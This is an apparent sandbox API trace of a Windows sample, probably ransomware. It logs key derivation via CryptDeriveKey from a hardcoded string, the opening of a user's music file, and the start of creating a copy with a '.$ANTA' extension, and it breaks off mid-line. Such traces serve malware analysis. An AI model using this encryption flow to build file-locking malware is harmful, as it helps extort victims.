[0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0113.271] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0113.272] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0113.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2848 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0113.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2668 [0113.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0113.273] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0113.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e27e8 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2728 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2b18 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0113.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e28a8 [0113.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2bd8 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0113.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0113.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0113.275] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0113.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0113.276] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0113.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0113.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0113.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0113.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0113.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0113.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0113.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0113.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0113.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0113.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0113.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca988, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0113.277] CryptHashData (hHash=0x41ac640, pbData=0x17e27e8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0113.277] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.277] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0113.277] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0113.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0113.277] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac280) returned 1 [0113.277] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.277] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0113.278] CryptDestroyHash (hHash=0x41ac640) returned 1 [0113.278] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\_lDKW-L4K_DTCAjQT1.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\_ldkw-l4k_dtcajqt1.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0113.278] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.278] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0113.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0113.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0113.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0113.278] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0113.279] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4948 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.279] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u")) returned 0x10 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0113.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d70 | out: hHeap=0x1780000) returned 1 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0113.280] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\_lDKW-L4K_DTCAjQT1.wav.$ANTA" (normalized: 